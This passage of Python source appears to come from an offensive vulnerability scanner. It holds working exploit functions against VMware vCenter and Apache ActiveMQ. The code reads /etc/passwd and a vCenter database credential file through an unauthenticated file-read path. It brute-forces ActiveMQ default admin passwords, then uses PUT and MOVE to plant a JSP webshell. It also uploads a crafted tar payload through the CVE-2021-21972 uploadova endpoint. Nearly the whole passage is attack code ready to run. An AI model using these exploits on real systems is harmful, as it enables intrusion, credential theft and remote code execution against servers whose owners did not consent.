self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2020-10-13"
self.vul_info["vul_vers"] = "<= 6.5u1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件读取"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned."
self.vul_info["cre_date"] = "2021-02-26"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close",
}
try:
url = urljoin(self.url, "/eam/vib?id=/etc/passwd")
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = url
self.vul_info[
"prt_info"] = "[file] [os:linux] [url:" + url + " ]"
else:
url = urljoin(
self.url,
"/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties"
)
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"dirver" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = url
self.vul_info[
"prt_info"] = "[file] [os:windows] [url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2016_3088_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2016-3088"
self.vul_info["vul_apps"] = "AcitveMQ"
self.vul_info["vul_date"] = "2016-03-10"
self.vul_info["vul_vers"] = "< 5.14.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
self.vul_info["cre_date"] = "2021-01-07"
self.vul_info["cre_auth"] = "zhzyker"
self.rawdata = None
self.path = "null"
self.name = random_md5()[:-20]
self.webshell = "/" + self.name + ".jsp"
self.poc = random_md5()
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
url = urljoin(self.url, "/admin/test/systemProperties.jsp")
self.request = requests.get(url,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
except IndexError:
pass
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.poc,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/api" + self.webshell,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.poc in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
self.vul_info[
"prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21972_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传"
self.vul_info["vul_numb"] = "CVE-2021-21972"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2021-02-24"
self.vul_info[
"vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件上传"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)"
self.vul_info["cre_date"] = "2021-02-25"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
url = urljoin(self.url,
"/ui/vropspluginui/rest/services/uploadova")
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 405:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = url
self.vul_info["prt_info"] = "[upload] [url:" + url + " ]"
headers = {
"User-Agent": self.ua,
"Accept": "*/*",
"Connection": "close"
}
path = os.path.split(os.path.realpath(sys.argv[0]))[0]
linux_tar = path + "/payload/payload/cve202121972_linux.tar"
file = {'uploadFile': open(linux_tar, 'rb')}
url = urljoin(self.url,
"/ui/vropspluginui/rest/services/uploadova")
r = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url,
"/ui/resources/vvvvvv.txt")
req = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if r"upload" in req.text:
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = linux_tar
self.vul_info[
"prt_info"] = "[upload] [os:linux] [url:" + url + " ]"
else:
windows_tar = path + "/payload/payload/cve202121972_windows.tar"
file = {'uploadFile': open(windows_tar, 'rb')}
url = requests.compat.urljoin(
self.url, "/ui/vropspluginui/rest/services/uploadova")
r = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url,
"/ui/resources/vvvvvv.txt")
req = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if r"upload" in req.text:
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = windows_tar
self.vul_info[
"prt_info"] = "[upload] [os:windows] [url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
